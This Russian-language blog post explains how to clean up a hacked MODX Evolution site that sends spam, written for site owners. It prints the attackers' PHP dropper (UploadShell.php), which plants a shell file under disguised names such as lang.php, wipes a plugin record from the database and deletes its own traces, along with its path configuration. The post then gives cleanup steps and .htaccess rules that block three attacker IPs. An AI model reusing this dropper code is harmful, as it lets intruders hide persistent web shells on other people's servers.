MODX Evo: Массовая рассылка корреспонденции (SPAM).
Служба мониторинга сервисов хостинг провайдера известила, что один из моих сайтов рассылает спам. При проверке сайта на наличие вредоностного кода, антивирусы промолчали. Пришлось воспользоваться гуглом. По данной проблеме MODX Evo: Массовая рассылка корреспонденции (SPAM) информации набралось не так уж много. На сайте одного из MODx сообществ решался аналогичный вопрос "Похоже тоже взломали. Пошли письма". Т.е. на сайт был загружен Shell, который производил массовую рассылку СПАМА.
Похоже тоже взломали. Пошли письма.
Один из участников сообщества поделился некими ранее обнаружившимися несколькими интересными файлами через которые все это безобразие заливается.
UploadShell.php
<?php
require_once $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php';
$file = file_get_contents($filePath);
$res = file_put_contents($uploadPath, $file);
global $modx;
$pluginsTable = $modx->getFullTableName("site_plugins");
$result = $modx->db->query("SELECT id FROM $pluginsTable WHERE name = 'exp' ");
$count = mysql_num_rows($result);
if ($count > 0) {
$row = $modx->db->getRow($result);
if ($row['id']) {
$pluginDel = $modx->db->query("DELETE FROM $pluginsTable WHERE name = 'exp' ");
$eventsTable = $modx->getFullTableName("site_plugin_events");
$id = $row['id'];
$eventDel = $modx->db->query("DELETE FROM $eventsTable WHERE pluginid = $id ");
$modx->clearCache();
include_once MODX_BASE_PATH . "manager/processors/cache_sync.class.processor.php";
$sync = new synccache();
$sync->setCachepath(MODX_BASE_PATH . "assets/cache/");
$sync->setReport(false);
$sync->emptyCache();
}
}
unlink($filePath);
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php');
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/UploadShell.php');
echo $res;
die();
FileSettings.php
<?php
# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
$uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
$fileBaseName = 'lang.php';
$uploadPath = $_SERVER['DOCUMENT_ROOT'].$uploadBasePath;
$filePath = $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/'.$fileBaseName;
$localFilePath = '/var/www/jonin/data/www/niblocklogistics.com/retro2/protected/commands/'.$fileBaseName;
Решение
Проверить папки с путями, что указаны в коде. Удалить файлы, что указаны в коде. Файлы Shell'а содержат обфусцированый код ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"] ... Так же необходимо удалить папку temp, которая лежит assets/cache/.
# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
$uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
$fileBaseName = 'lang.php';
После того, как вы удалили вредоносные файлы Shell'a. Пройдите следующую процедуру.
- Произведите BackUp всего проекта и Базы Данной.
- Обновите Вашу систему управления до последней актуальной версии.
- Смените пароль FTP доступа.
- В файл htaccess добавить правило
Order Deny,Allow
Deny from 80.243.184.227
Deny from 77.59.166.128
Deny from 146.185.239.19
Параметры getImageList MIGX
Создание страницы с ошибкой 404 в MODX Revolution
RESTful API в MODX Rrevolution
Создание тегов, меток или хэштегов в MODx
Документация по pdoCrumbs
Документация по pdoPage
Документация по pdoMenu
Настраиваем турбо-страницы Yandex в MODx Revo
Авторизация через соц.сети в MODX: hybridauth
Условия в MODx Revo сниппет IF
Документация MIGx
По шаговое обновление Modx Revolution до последней версии
Документация по pdoResources
Форматирование даты в MODx Revo
Облако тегов в MODX revolution
Перенос MODX Revolution на хостинг или с домена на домен
Настройка ЧПУ и htaccess для MODX Revolution
MODX - Добавление reCaptcha в FormIt и Login
Работа с ресурсами в MODx revolution
Вывод даты MODx Revo
Документация по getResources
Как создать карту сайта в MODX Revo
Проcтая форма обратной связи на MODx Revolution + FormIt
Как сделать меню на MODx при помощи Wayfinder
MODx Revo - поиск по сайту SimpleSearch modx
Быстрый старт в MODX Revolution
MODX Evo: Массовая рассылка корреспонденции (SPAM).
Возможно, вам будет интересно
Работа с ресурсами в MODx revolution
Ресурс в modx это объект, содержащий стандартный набор полей, который может быть расширен за счёт TV-параметров. Отличительной особенностью ресурса является наличие уникального URL адреса по которому к нему можно обратиться.
Документация по pdoCrumbs
Сниппет для построения навигации в стиле хлебных крошек. Хорошо заменяет сниппет BreadCrumb в MODx, работает с документами из любых контекстов и позволяет указывать различные условия для выборки ресурсов.
Как создать карту сайта в MODX Revo
Для создания карты сайта sitemap в MODx Revolution (Revo), можно воспользоваться дополнением GoogleSiteMap. Вся процедура установки достаточно проста и займет не более 10 минут.
RESTful API в MODX Rrevolution
В MODX 2.3 был замечен удобный способ разработки API-интерфейсов RESTful поверх MODX. Это делается с поддержкой класса modRestService и производных modRestController. Он поддерживает большое количество интересных функций для взаимодействия с экземплярами xPDOObject.
